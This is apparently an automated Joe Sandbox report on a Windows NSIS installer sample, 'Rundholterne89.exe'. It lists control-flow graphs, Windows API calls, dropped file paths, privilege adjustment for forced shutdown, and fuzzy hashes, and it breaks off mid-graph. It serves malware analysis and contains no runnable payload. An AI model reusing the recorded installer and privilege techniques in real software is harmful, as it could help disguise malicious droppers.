4033c2-4033cc 57->71 72 40338e-4033b7 57->72 64 403403 58->64 64->53 69 403543-40355c GetCurrentProcess OpenProcessToken 66->69 70 4035bd-4035c5 66->70 78 40358e-40359c call 4060c8 69->78 79 40355e-403588 LookupPrivilegeValueA AdjustTokenPrivileges 69->79 73 4035c7 70->73 74 4035cb-4035cf ExitProcess 70->74 76 403433-403447 call 4054a8 lstrcatA 71->76 77 4033ce-4033db call 40588f 71->77 80 4033b9-4033bb 72->80 73->74 89 403454-40346e lstrcatA lstrcmpiA 76->89 90 403449-40344f lstrcatA 76->90 77->53 88 4033dd-4033f3 call 405d2f * 2 77->88 91 4035aa-4035b4 ExitWindowsEx 78->91 92 40359e-4035a8 78->92 79->78 80->71 84 4033bd-4033c0 80->84 84->71 84->80 88->58 89->53 94 403470-403473 89->94 90->89 91->70 95 4035b6-4035b8 call 40140b 91->95 92->91 92->95 97 403475-40347a call 40540e 94->97 98 40347c call 40548b 94->98 95->70 106 403481-40348e SetCurrentDirectoryA 97->106 98->106 107 403490-403496 call 405d2f 106->107 108 40349b-4034c3 call 405d2f 106->108 107->108 112 4034c9-4034e5 call 405d51 DeleteFileA 108->112 115 403526-40352d 112->115 116 4034e7-4034f7 CopyFileA 112->116 115->112 117 40352f-403536 call 405bea 115->117 116->115 118 4034f9-403519 call 405bea call 405d51 call 4054c0 116->118 117->53 118->115 127 40351b-403522 CloseHandle 118->127 127->115
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE ref: 00403134
                                                                                            • GetVersion.KERNEL32 ref: 0040313A
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                            • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                            • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                            • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                            • GetCommandLineA.KERNEL32(Hermandas Setup,NSIS Error), ref: 004031BD
                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Rundholterne89.exe",00000000), ref: 004031D0
                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Rundholterne89.exe",00000020), ref: 004031FB
                                                                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                            • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                            • ExitProcess.KERNEL32 ref: 0040342D
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                            • ExitProcess.KERNEL32 ref: 004035CF
                                                                                              • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                            • String ID: "$"C:\Users\user\Desktop\Rundholterne89.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\Desktop$C:\Users\user\Desktop\Rundholterne89.exe$Error launching installer$Hermandas Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KNw$~nsu
                                                                                            • API String ID: 3329125770-3009530420
                                                                                            • Opcode ID: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                            • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                            • Opcode Fuzzy Hash: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                            • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 128 4048c5-404911 GetDlgItem * 2 129 404b31-404b38 128->129 130 404917-4049ab GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 128->130 131 404b3a-404b4a 129->131 132 404b4c 129->132 133 4049ba-4049c1 DeleteObject 130->133 134 4049ad-4049b8 SendMessageA 130->134 135 404b4f-404b58 131->135 132->135 136 4049c3-4049cb 133->136 134->133 137 404b63-404b69 135->137 138 404b5a-404b5d 135->138 139 4049f4-4049f8 136->139 140 4049cd-4049d0 136->140 144 404b78-404b7f 137->144 145 404b6b-404b72 137->145 138->137 141 404c47-404c4e 138->141 139->136 146 4049fa-404a26 call 403f14 * 2 139->146 142 4049d2 140->142 143 4049d5-4049f2 call 405d51 SendMessageA * 2 140->143 147 404c50-404c56 141->147 148 404cbf-404cc7 141->148 142->143 143->139 150 404b81-404b84 144->150 151 404bf4-404bf7 144->151 145->141 145->144 179 404af0-404b03 GetWindowLongA SetWindowLongA 146->179 180 404a2c-404a32 146->180 153 404ea7-404eb9 call 403f7b 147->153 154 404c5c-404c66 147->154 156 404cd1-404cd8 148->156 157 404cc9-404ccf SendMessageA 148->157 159 404b86-404b8d 150->159 160 404b8f-404ba4 call 404813 150->160 151->141 155 404bf9-404c03 151->155 154->153 162 404c6c-404c7b SendMessageA 154->162 164 404c13-404c1d 155->164 165 404c05-404c11 SendMessageA 155->165 166 404cda-404ce1 156->166 167 404d0c-404d13 156->167 157->156 159->151 159->160 160->151 189 404ba6-404bb7 160->189 162->153 173 404c81-404c92 SendMessageA 162->173 164->141 175 404c1f-404c29 164->175 165->164 176 404ce3-404ce4 ImageList_Destroy 166->176 177 404cea-404cf1 166->177 171 404e69-404e70 167->171 172 404d19-404d25 call 4011ef 167->172 171->153 184 404e72-404e79 171->184 200 404d35-404d38 172->200 201 404d27-404d2a 172->201 182 404c94-404c9a 173->182 183 404c9c-404c9e 173->183 185 404c3a-404c44 175->185 186 404c2b-404c38 175->186 176->177 187 404cf3-404cf4 GlobalFree 177->187 188 404cfa-404d06 177->188 195 404b09-404b0d 179->195 191 404a35-404a3b 180->191 182->183 193 404c9f-404cb8 call 401299 SendMessageA 182->193 183->193 184->153 194 404e7b-404ea5 ShowWindow GetDlgItem ShowWindow 184->194 185->141 186->141 187->188 188->167 189->151 190 404bb9-404bbb 189->190 196 404bbd-404bc4 190->196 197 404bce 190->197 198 404ad1-404ae4 191->198 199 404a41-404a69 191->199 193->148 194->153 203 404b27-404b2f call 403f49 195->203 204 404b0f-404b22 ShowWindow call 403f49 195->204 206 404bc6-404bc8 196->206 207 404bca-404bcc 196->207 210 404bd1-404bed call 40117d 197->210 198->191 214 404aea-404aee 198->214 208 404aa3-404aa5 199->208 209 404a6b-404aa1 SendMessageA 199->209 215 404d79-404d9d call 4011ef 200->215 216 404d3a-404d53 call 4012e2 call 401299 200->216 211 404d2c 201->211 212 404d2d-404d30 call 404893 201->212 203->129 204->153 206->210 207->210 220 404aa7-404ab6 SendMessageA 208->220 221 404ab8-404ace SendMessageA 208->221 209->198 210->151 211->212 212->200 214->179 214->195 229 404da3 215->229 230 404e3f-404e53 InvalidateRect 215->230 238 404d63-404d72 SendMessageA 216->238 239 404d55-404d5b 216->239 220->198 221->198 233 404da6-404db1 229->233 230->171 232 404e55-404e64 call 4047e6 call 4047ce 230->232 232->171 235 404db3-404dc2 233->235 236 404e27-404e39 233->236 243 404dc4-404dd1 235->243 244 404dd5-404dd8 235->244 236->230 236->233 238->215 240 404d5d 239->240 241 404d5e-404d61 239->241 240->241 241->238 241->239 243->244 245 404dda-404ddd 244->245 246 404ddf-404de8 244->246 248 404ded-404e25 SendMessageA * 2 245->248 246->248 249 404dea 246->249 248->236 249->248
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                            • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                                            • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                            • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404CE4
                                                                                            • GlobalFree.KERNEL32(?), ref: 00404CF4
                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                                            • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 1638840714-813528018
                                                                                            • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                            • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                            • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                            • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 494 405d51-405d5c 495 405d5e-405d6d 494->495 496 405d6f-405d84 494->496 495->496 497 405f77-405f7b 496->497 498 405d8a-405d95 496->498 500 405f81-405f8b 497->500 501 405da7-405db1 497->501 498->497 499 405d9b-405da2 498->499 499->497 503 405f96-405f97 500->503 504 405f8d-405f91 call 405d2f 500->504 501->500 502 405db7-405dbe 501->502 505 405dc4-405df9 502->505 506 405f6a 502->506 504->503 508 405f14-405f17 505->508 509 405dff-405e0a GetVersion 505->509 510 405f74-405f76 506->510 511 405f6c-405f72 506->511 514 405f47-405f4a 508->514 515 405f19-405f1c 508->515 512 405e24 509->512 513 405e0c-405e10 509->513 510->497 511->497 516 405e2b-405e32 512->516 513->512 519 405e12-405e16 513->519 517 405f58-405f68 lstrlenA 514->517 518 405f4c-405f53 call 405d51 514->518 520 405f2c-405f38 call 405d2f 515->520 521 405f1e-405f2a call 405c8d 515->521 522 405e34-405e36 516->522 523 405e37-405e39 516->523 517->497 518->517 519->512 526 405e18-405e1c 519->526 531 405f3d-405f43 520->531 521->531 522->523 529 405e72-405e75 523->529 530 405e3b-405e5e call 405c16 523->530 526->512 532 405e1e-405e22 526->532 535 405e85-405e88 529->535 536 405e77-405e83 GetSystemDirectoryA 529->536 542 405e64-405e6d call 405d51 530->542 543 405efb-405eff 530->543 531->517 534 405f45 531->534 532->516 538 405f0c-405f12 call 405f9a 534->538 540 405ef2-405ef4 535->540 541 405e8a-405e98 GetWindowsDirectoryA 535->541 539 405ef6-405ef9 536->539 538->517 539->538 539->543 540->539 544 405e9a-405ea4 540->544 541->540 542->539 543->538 547 405f01-405f07 lstrcatA 543->547 549 405ea6-405ea9 544->549 550 405ebe-405ed4 SHGetSpecialFolderLocation 544->550 547->538 549->550 554 405eab-405eb2 549->554 551 405ed6-405eed SHGetPathFromIDListA CoTaskMemFree 550->551 552 405eef 550->552 551->539 551->552 552->540 555 405eba-405ebc 554->555 555->539 555->550
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
                                                                                            • GetSystemDirectoryA.KERNEL32(C:\Users\user\Stanglorgnet.bro,00000400), ref: 00405E7D
                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\Stanglorgnet.bro,00000400), ref: 00405E90
                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0041C205), ref: 00405ECC
                                                                                            • SHGetPathFromIDListA.SHELL32(0041C205,C:\Users\user\Stanglorgnet.bro), ref: 00405EDA
                                                                                            • CoTaskMemFree.OLE32(0041C205), ref: 00405EE5
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\Stanglorgnet.bro,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                                            • lstrlenA.KERNEL32(C:\Users\user\Stanglorgnet.bro,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                            • String ID: C:\Users\user\Stanglorgnet.bro$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                            • API String ID: 900638850-1361145835
                                                                                            • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                            • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                                            • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                            • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 556 4055d1-4055f7 call 40588f 559 405610-405617 556->559 560 4055f9-40560b DeleteFileA 556->560 562 405619-40561b 559->562 563 40562a-40563a call 405d2f 559->563 561 40579a-40579e 560->561 564 405621-405624 562->564 565 405748-40574d 562->565 571 405649-40564a call 4057e8 563->571 572 40563c-405647 lstrcatA 563->572 564->563 564->565 565->561 567 40574f-405752 565->567 569 405754-40575a 567->569 570 40575c-405764 call 406033 567->570 569->561 570->561 580 405766-40577a call 4057a1 call 405589 570->580 573 40564f-405652 571->573 572->573 576 405654-40565b 573->576 577 40565d-405663 lstrcatA 573->577 576->577 579 405668-405686 lstrlenA FindFirstFileA 576->579 577->579 581 40568c-4056a3 call 4057cc 579->581 582 40573e-405742 579->582 592 405792-405795 call 404f48 580->592 593 40577c-40577f 580->593 590 4056a5-4056a9 581->590 591 4056ae-4056b1 581->591 582->565 584 405744 582->584 584->565 590->591 594 4056ab 590->594 595 4056b3-4056b8 591->595 596 4056c4-4056d2 call 405d2f 591->596 592->561 593->569 598 405781-405790 call 404f48 call 405bea 593->598 594->591 600 4056ba-4056bc 595->600 601 40571d-40572f FindNextFileA 595->601 606 4056d4-4056dc 596->606 607 4056e9-4056f4 call 405589 596->607 598->561 600->596 605 4056be-4056c2 600->605 601->581 604 405735-405738 FindClose 601->604 604->582 605->596 605->601 606->601 609 4056de-4056e7 call 4055d1 606->609 616 405715-405718 call 404f48 607->616 617 4056f6-4056f9 607->617 609->601 616->601 619 4056fb-40570b call 404f48 call 405bea 617->619 620 40570d-405713 617->620 619->601 620->601
                                                                                            APIs
                                                                                            • DeleteFileA.KERNELBASE(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                            • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                            • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                            • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                                            • \*.*, xrefs: 0040563C
                                                                                            • "C:\Users\user\Desktop\Rundholterne89.exe", xrefs: 004055D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                            • API String ID: 2035342205-3741676201
                                                                                            • Opcode ID: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                            • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                            • Opcode Fuzzy Hash: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                            • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNELBASE(774D3410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,774D3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040604A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID:
                                                                                            • API String ID: 2295610775-0
                                                                                            • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                            • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                                            • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                            • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 250 403a41-403a53 251 403b94-403ba3 250->251 252 403a59-403a5f 250->252 254 403bf2-403c07 251->254 255 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 251->255 252->251 253 403a65-403a6e 252->253 256 403a70-403a7d SetWindowPos 253->256 257 403a83-403a86 253->257 259 403c47-403c4c call 403f60 254->259 260 403c09-403c0c 254->260 255->254 256->257 262 403aa0-403aa6 257->262 263 403a88-403a9a ShowWindow 257->263 267 403c51-403c6c 259->267 265 403c0e-403c19 call 401389 260->265 266 403c3f-403c41 260->266 268 403ac2-403ac5 262->268 269 403aa8-403abd DestroyWindow 262->269 263->262 265->266 287 403c1b-403c3a SendMessageA 265->287 266->259 272 403ee1 266->272 273 403c75-403c7b 267->273 274 403c6e-403c70 call 40140b 267->274 278 403ac7-403ad3 SetWindowLongA 268->278 279 403ad8-403ade 268->279 276 403ebe-403ec4 269->276 275 403ee3-403eea 272->275 283 403c81-403c8c 273->283 284 403e9f-403eb8 DestroyWindow EndDialog 273->284 274->273 276->272 281 403ec6-403ecc 276->281 278->275 285 403b81-403b8f call 403f7b 279->285 286 403ae4-403af5 GetDlgItem 279->286 281->272 289 403ece-403ed7 ShowWindow 281->289 283->284 290 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 283->290 284->276 285->275 291 403b14-403b17 286->291 292 403af7-403b0e SendMessageA IsWindowEnabled 286->292 287->275 289->272 320 403ce1-403ce6 